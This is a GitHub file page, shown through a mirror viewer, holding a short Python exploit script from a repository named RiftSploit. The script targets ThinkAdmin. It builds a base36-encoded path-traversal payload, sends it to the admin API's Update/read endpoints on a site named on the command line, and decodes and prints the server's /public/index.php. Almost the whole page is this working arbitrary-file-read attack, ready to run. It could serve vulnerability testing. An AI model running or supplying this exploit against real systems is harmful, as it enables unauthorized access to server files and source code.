FazBrowse GitHub Viewer
|
Trending
|
URL:
|
Home
Tools:
[Download Repo ZIP]
[View Raw Code]
[Original HTTPS Page]
scripts/Thinkadmin_Arbitrary_File_Read.py at master · RiftSploit/scripts · GitHub
RiftSploit
/
scripts
Public
forked from
myh0st/scripts
Notifications
You must be signed in to change notification settings
Fork
0
Star
0
Code
Pull requests
0
Actions
Projects
Security and quality
0
Insights
Additional navigation options
Code
Pull requests
Actions
Projects
Security and quality
Insights
Expand file tree
Breadcrumbs
scripts
/
Thinkadmin_Arbitrary_File_Read.py
Copy path
More file actions
More file actions
Latest commit
History
History
History
65 lines (52 loc) · 1.82 KB
Breadcrumbs
scripts
/
Thinkadmin_Arbitrary_File_Read.py
Copy path
File metadata and controls
65 lines (52 loc) · 1.82 KB
Raw
Copy raw file
Download raw file
Open symbols panel
Edit and raw actions
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
#!/usr/bin/env python3
import
sys
import
json
import
base64
import
requests
import
warnings
warnings
.
filterwarnings
(
"ignore"
)
headers
=
{
'User-Agent'
:
'Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0'
}
def
encode
(
num
,
b
):
"""
对请求的文件名进行编码
:param str num: 要编码的字符
:param int b: 编码位数
:return str result,'错误原因'
"""
return
((
num
==
0
)
and
"0"
)
or
\
(
encode
(
num
//
b
,
b
).
lstrip
(
"0"
)
+
"0123456789abcdefghijklmnopqrstuvwxyz"
[
num
%
b
])
def
check
(
site
):
"""
检测是否存在漏洞
:param:
:return bool True or False: 是否存在漏洞
"""
try
:
file_prefix_list
=
[
'/'
,
'application/admin/../../../../../../../'
]
path_name_list
=
[
'/admin.html?s=admin/api.Update/read/'
,
'/admin.html?s=admin/api.Update/get/encode/'
]
for
file_prefix
in
file_prefix_list
:
for
path_name
in
path_name_list
:
payload
=
file_prefix
+
'/public/index.php'
payload
=
payload
.
encode
(
'utf-8'
)
poc
=
""
for
i
in
payload
:
poc
+=
encode
(
i
,
36
)
link
=
site
+
path_name
+
poc
try
:
req
=
requests
.
get
(
link
,
headers
=
headers
,
verify
=
False
)
if
req
.
status_code
==
200
:
json_data
=
req
.
json
()[
'data'
]
if
json_data
:
print
(
"读取文件:/public/index.php"
,
"
\n
"
,
"文件内容:"
,
"
\n
"
,
base64
.
b64decode
(
json_data
[
'content'
]).
decode
())
return
True
except
Exception
as
e
:
print
(
e
)
pass
except
Exception
as
e
:
print
(
e
)
pass
if
__name__
==
"__main__"
:
check
(
sys
.
argv
[
1
])
Back
|
FazBrowse Home
|
New Git URL